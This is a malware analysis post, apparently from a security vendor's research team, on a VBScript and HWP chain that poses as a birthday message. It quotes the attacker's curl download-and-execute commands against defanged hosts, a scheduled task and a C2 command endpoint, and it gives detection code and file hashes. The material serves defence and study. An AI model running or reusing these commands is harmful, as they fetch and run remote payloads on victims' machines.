Malicious HWP File Disguised as a Happy Birthday Message (OLE Object)

The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of the malware is yet to be determined, but the VBScript is downloaded through curl.

The commands discovered so far are as follows:

  • curl  -H \"user-agent: chrome/103.0.5060.134 safari/537.32\" hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp
  • cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp

Both commands save a script in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript code that performs actions such as registering a scheduled task and downloading additional files.

Figure 1. Script found in hxxp://datkka.atwebpages[.]com/2vbs

The downloaded vbtemp file is run with the command wscript  //e:vbscript //b %APPDATA%\vbtemp. For the script to execute properly, a tmp~pth file must exist in the %APPDATA% folder. Although the tmp~pth file has not been found, it is likely that the APPDATA folder path is saved in it.
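A detection sketch for the pattern described above, added here as an example and not taken from ASEC's analysis: wscript is forced to a script engine with //e: because the file has no script extension, and that same file was written earlier by curl -o. The event tuples, user name, paths and the example.invalid host are constructed.

```python
import ntpath
import re

# Constructed process-creation events (pid, command line) modelled on the
# commands in this post; environment variables are shown already expanded.
EVENTS = [
    (4100, r'curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" '
           r'http://example.invalid/2vbs -o C:\Users\kim\AppData\Roaming\vbtemp'),
    (4120, r'wscript //e:vbscript //b C:\Users\kim\AppData\Roaming\vbtemp'),
    (4200, r'curl https://example.invalid/setup.msi -o C:\Users\kim\Downloads\setup.msi'),
    (4300, r'wscript.exe C:\Tools\inventory.vbs'),
]

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf"}
CURL_OUT = re.compile(r'\bcurl(?:\.exe)?\b.*?\s(?:-o|--output)\s+(?:"([^"]+)"|(\S+))', re.I)
WSH = re.compile(r'\b[wc]script(?:\.exe)?\s+(.*)', re.I)

def norm(path):
    """Case-fold and normalise a Windows path so the two events compare equal."""
    return ntpath.normcase(ntpath.normpath(path.strip('"')))

def detect(events):
    """Return (pid, script, reasons) for each suspicious script-host launch."""
    written_by_curl = {}              # normalised output path -> curl pid
    alerts = []
    for pid, cmd in events:
        out = CURL_OUT.search(cmd)
        if out:
            written_by_curl[norm(out.group(1) or out.group(2))] = pid
        host = WSH.search(cmd)
        if not host:
            continue
        tokens = re.findall(r'"[^"]*"|\S+', host.group(1))
        forced = any(t.lower().startswith("//e:") for t in tokens)
        script = next((t for t in tokens if not t.startswith("//")), None)
        if script is None:
            continue
        reasons = []
        # WSH picks the engine from the extension, so //e: on a file without
        # a script extension means the payload is hiding its type.
        if forced and ntpath.splitext(script.strip('"'))[1].lower() not in SCRIPT_EXTS:
            reasons.append("engine forced with //e: on a non-script file name")
        if norm(script) in written_by_curl:
            reasons.append(f"file was written by curl (pid {written_by_curl[norm(script)]})")
        if reasons:
            alerts.append((pid, script, reasons))
    return alerts
```

Only the wscript launch of vbtemp is reported; the ordinary .vbs launch and the curl download that is never executed by a script host are not.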

When the vbtemp file is executed, it downloads the HWP file with the curl command, saves it as 1.hwp in the path stored in the %APPDATA%\tmp~pth file, and then executes it. The command executed in this process is as follows.

cmd /c  curl -H "User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) hrome/53.0.3027.64 Safari/537.32" hxxps://bigfile.mail.naver[.]com/download?fid=adR0Wz+5+BKjK3YXKoF0KxuXKAElKxujKogZKog/KoUwKAUdFAujKxMrKqbXKoKla3YlFxUmaxUmF4J4pztrpAUqMxM/K6FCK4M9KqpvpovwMm== -o [Path saved in \tmp~pth]\1.hwp && [Path saved in \tmp~pth]\1.hwp
Command 1 executed in vbtemp

Afterward, in the same way as above, the curl command is used to download an additional script, which is saved as %APPDATA%\Microsoft\Windows\Themes\TransWallpaper. The 1.hwp file that was downloaded earlier is then executed once more.

cmd /c curl -H "User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3027.64 Safari/537.32" hxxp://datkka.atwebpages[.]com/mal -o  %APPDATA%\Microsoft\Windows\Themes\TransWallpaper && [Path saved in \tmp~pth]\1.hwp
Command 2 executed in vbtemp
Figure 2. Script found in hxxp://datkka.atwebpages[.]com/mal

The created TransWallpaper file is registered in the task scheduler, enabling the script to be executed every 30 minutes.

Figure 3. Created task scheduler

This script file executes additional commands received from hxxp://datkka.atwebpages[.]com/down.php. At the moment the “cmd /c calc” command shown below is received, but the attacker can modify the command, in which case various malicious behaviors can be performed.

Figure 4. Response from hxxp://datkka.atwebpages[.]com/down.php

The HWP file that was saved as 1.hwp earlier creates HappyBirthday.vbs in the %temp% folder upon execution.

The HWP file contains a link written with a relative path. When the user clicks the link, the ..\AppData\Local\Temp\HappyBirthday (2).vbs file is executed. It appears that the file executed here is named HappyBirthday (2).vbs because the 1.hwp file is executed twice during script execution. When the user simply clicks and opens the HWP file by itself, the malicious behavior is not performed because the name of the dropped HappyBirthday.vbs file does not match.

Figure 5. HWP file
Figure 6. HWP file information

As can be seen in [Figure 6], the author of the HWP file is found to be a ‘Korean Peninsula Peace Education Platform,’ and it appears that it was created to target individuals with connections to North Korea.

The HappyBirthday.vbs file dropped and executed by the HWP file accesses hxxps://driver.googledocs.cloudns[.]nz/Yb/yb and downloads an additional script before saving it to %appdata%\tmp~1 and executing it.

curl -k -H ""User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"" hxxps://driver.googledocs.cloudns[.]nz/Yb/yb -o %appdata%\tmp~1 & wscript.exe //e:vbscript //b %appdata%\tmp~1
HappyBirthday.vbs execution commands
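The three User-Agent headers in the curl commands above differ in how closely they imitate a browser. The following check, added as an example and not part of ASEC's analysis, flags the hand-typed ones in proxy logs; the heuristics (prefix, token casing, the KHTML token, matching AppleWebKit and Safari versions for strings that claim to be Chrome) are assumptions of this example.

```python
import re

# User-Agent values copied from the three curl commands quoted in this post.
UA_2VBS = "chrome/103.0.5060.134 safari/537.32"
UA_VBTEMP = ("Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 "
             "(KHTML, live Gecko) Chrome/53.0.3027.64 Safari/537.32")
UA_BIRTHDAY = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36")

CANONICAL = {"mozilla": "Mozilla", "applewebkit": "AppleWebKit",
             "chrome": "Chrome", "safari": "Safari"}
PRODUCT = re.compile(r"([A-Za-z]+)/(\d+(?:\.\d+)*)")

def ua_anomalies(ua):
    """Return reasons a User-Agent that claims to be Chrome looks hand-typed."""
    found = PRODUCT.findall(ua)
    versions = {name.lower(): ver for name, ver in found}
    if "chrome" not in versions:
        return []                      # only judge strings that claim Chrome
    issues = []
    if not ua.startswith("Mozilla/5.0 ("):
        issues.append("no Mozilla/5.0 prefix")
    for name, _ in found:
        want = CANONICAL.get(name.lower())
        if want and name != want:
            issues.append(f"product token '{name}' is not cased as '{want}'")
    if "(KHTML, like Gecko)" not in ua:
        issues.append("missing or altered '(KHTML, like Gecko)' token")
    webkit, safari = versions.get("applewebkit"), versions.get("safari")
    if webkit and safari and webkit != safari:
        issues.append(f"AppleWebKit/{webkit} does not match Safari/{safari}")
    return issues
```

The header used by HappyBirthday.vbs is well formed and passes every check, so this heuristic supplements process and destination telemetry and does not replace it.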

As hxxps://driver.googledocs.cloudns[.]nz/Yb/yb cannot currently be accessed, the team could not find out what the file does afterward. However, various malicious commands can be executed depending on the intentions of the attacker.

The exact distribution path of the malware is yet to be identified, but as it uses a variety of files, user discretion is advised. Users should refrain from executing files from unknown sources and update V3 and applications they use to the latest version.

[File Detection]

7c38b40ec19609f32de2a70d409c38b0 (vbs)
60d117f5cb7b0f8133967ec535c85c6a (vbs)
d86d57c1d8670d510e7b7a1ad7db9fd2 (vbs)
6083a1af637d9dd2b2a16538a17e1f45 (hwp)
ca2917006eb29171c9e5f374e789f53a (vbs)
